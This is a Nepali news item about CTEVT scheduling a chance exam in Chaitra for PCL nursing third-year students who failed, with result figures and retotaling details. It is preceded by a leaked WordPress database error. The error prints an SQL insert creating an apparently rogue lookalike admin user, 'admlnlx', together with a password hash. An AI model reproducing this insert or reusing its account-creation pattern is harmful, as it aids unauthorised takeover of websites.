WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bp1btcOAui1dc4SgEZA524/QJxHYec0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:21:28', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस २८ –
पिसिएल नर्सिङ तेस्रो वर्षमा फेल भएका विद्यार्थीको मौका परीक्षा चैतमा हुने भएको छ। सिटिइभिटीका परीक्षा नियन्त्रक ईश्वरी भट्टका अनुसार एक विषयमा अनुत्तीर्ण भएका विद्यार्थीले चैतमा मौका परीक्षा दिन पाउनेछन्। मौका परीक्षाको नतिजा पनि चैतमै प्रकाशित हुनेछ।
उनका अनुसार एक विषयभन्दा बढीमा अनुत्तीर्ण भएका विद्यार्थीको परीक्षा भने २०७४ साउनमा हुनेछ। पुस १९ गते सार्वजनिक भएको नतिजामा ९६ कलेजका तीन हजार ७ सय ७८ विद्यार्थीले परीक्षा दिएकोमा तीन हजार पाँच सय ८५ विद्यार्थी पास भएका थिए। परीक्षामा एक सय ९३ विद्यार्थी अनुत्तीर्ण भएका थिए।
नतिजाको रिटोटलिङका लागि माघ ११ गतेसम्म विद्यार्थीले सम्पर्क गर्न सक्नेछन्। रिटोलिङका लागि सिटिइभिटीको केन्द्रीय कार्यालय भक्तपुर तथा क्षेत्रीय कार्यालयहरु इटहरी, चितवन र कोहलपुरमा आवेदन दिन सकिनेछ।